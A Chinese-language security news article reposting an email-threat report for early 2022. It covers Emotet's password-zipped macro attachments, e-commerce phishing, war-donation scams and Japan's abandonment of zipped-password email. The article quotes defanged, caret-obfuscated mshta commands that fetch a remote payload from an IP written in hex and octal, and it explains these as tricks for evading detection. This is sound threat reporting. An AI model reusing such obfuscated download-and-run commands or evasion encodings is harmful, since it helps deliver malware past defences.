freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

ASRC 2022年第一季电子邮件安全观察
2022-05-09 17:22:07
所属地 上海

2022第一季,所有企业都能明显感觉到的威胁邮件,即是Emotet的攻击。Emotet的攻击,使用了各种藏匿及混淆的手段,用以躲避防毒及网安防护软件的检测,而其中最重要的一个手段就是压缩加密。在传输附件前先经过「压缩加密」,这在过去的用途,多半是为了保护保密文件在传输过程中,不被传递路径的中间人取得或窥探的防护手段;而现在,却经常成为恶意软件用以躲避信息安全软件检测的保护伞。在滥用情况日趋恶化的情况下,也开始迫使企业开始重新思考是否改变保密数据的传递方式,而直接将邮件内的加密压缩文件视为可疑或威胁的来源。

ASRC 研究中心与守内安,分享在这一季观察到的几个特殊邮件案例:

Emotet 再度现身,以加密恶意附件躲避防御侦测

虽然欧洲刑警组织(Europol)与其它8个国家的执法机构在2021年1月下旬,连手破获了Emotet僵尸网络,但新的Emotet服务器和恶意软件样本已于2021/11/14出现,并通过电子邮件大量散播。Emotet的垃圾邮件攻击行动所携带于邮件里的恶意Office文件多为xls、xlsx、xlsm、doc、docx、docm...等等,部分以zip加上密码的方式,躲避信息安全防御的侦测。当收件者不慎执行恶意Office文件内的宏,Office文件内纪录的 URL 列表即会被尝试下载,扩展名可能为 .ocx 文档,但实为 DLL 的文档。接着使用 regsvr/ 3/ 2.exe -s 指令,于收件者的 Windows 内执行 .ocx。

随后进行潜伏:将 .ocx 复制到用户目录下的「AppData\Local\随机目录名称」,并随机取名 xxxxxxx.yyy (x长度不定),再将该 .ocx 删除。执行 C:\Windows\system32\regsvr 3 / 2.exe /s "C:\Users\用户名称AppData\Local\随机目录名称下的恶意文件,并通过 registry 设定开机执行。

较特别的是,用以隐匿恶意文件的连接,使用了多种手法躲避,例如:分别使用十六进制、八进制的方法,来存放远程服务器的IP地址,进而让 Emotet下载第2阶段的恶意软件,现行的信息安全防护系统很可能无法察觉情况。

以下为一个示例:

使用十六进制搭配混淆手段,让许多URI格式的恶意指标侦测失灵

同一网址可表达为:

  • 十进制格式: hxxp://185.7.214.7
  • 十六进制格式: hxxp://0xb907d607
  • 八进制格式: hxxp://0056.0151.0121.0114

以上格式,浏览器都可以解析。实际上在Office攻击文件中还搭配了混淆的手段,呈现为:

  • cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html
  • cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html

这让许多URI格式的恶意指标侦测失灵。

以zip加上密码的方式,躲避信息安全防御工事的侦测

由于这一波的Emotet攻势,与2021第四季相比较,邮件中带有恶意Office文件的数量成长了近40%;邮件中带有恶意Zip文件,成长了近一倍。

针对电商账号的钓鱼攻击

在三月份,我们观察到针对特定电商的钓鱼邮件,这些钓鱼邮件主要诈骗的目标为电商平台的登入账号密码。在成功取得账户密码后,除了能利用电商进行一些虚假交易外,账号密码也可能被拿到其他的社群、电商、电子邮件登入入口尝试凭证填充 (Credential Stuffing) 攻击。钓鱼网站的域名都在近期申请,并利用三或四级域名并将电商品牌关键词包含在内,以获取收件人进一步的信任。

利用三或四级域名让收件者看到与电商相关的关键词从而放下戒心

防范钓鱼邮件教学的钓鱼邮件

在这一季发现一个有趣的案例:教人防范钓鱼邮件的教学,内容却是带有连接钓鱼网站的钓鱼邮件。正当我们好奇想了解这个网站想钓是哪些资料时,钓鱼页面已经显示这个页面遭到停权。

货真价实的钓鱼邮件,内容却为防范钓鱼邮件的教学

利用俄乌战争话题的诈骗邮件

广受关注的时事新闻一直都是黑客爱用的工具。2022年2月24日爆发俄乌战争,从3月初开始有大量假借战争募捐的诈骗邮件四处流窜。与过去常见的419scam不同的地方是,诈骗邮件的内容提及由于战争的关系,银行已经无法正常运营,因此募集的是加密货币,以比特币为主。

大量假藉战争募款相关的诈骗邮件募集的是加密货币

日本政府与企业开始废除附件ZIP 加密的传输方

在日本已运行多年,以附件ZIP加密码的信息安全防护方式简称为PPAP。PPAP是由4个词所组成,Password付きzipファイルを送ります、Passwordを送ります、An号化、Protocol(プロトコル)。一般指将电子邮件携带的附件,通过ZIP加密压缩,再将可以解压缩的密码,通过另一封邮件发给对方解密。PPAP的使用有许多疑虑与弊端存在:加密文件与密码经常使用相同的通讯管道分次传输、长久使用固定密码以及加密文件直接遭到拦截并被暴力破解的情况等,都说明了PPAP的使用并不安全。去年底至今年第一季度,日本有多个大型企业集团直接废除PPAP的传输方式,并宣布接收外部邮件时,将会直接过滤带有密码的压缩文件,这个决定恰与Emotet的卷土重来大量滥发的时间点不谋而合。

# Emotet # 钓鱼邮件 # 邮件安全 # 邮件安全报告
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者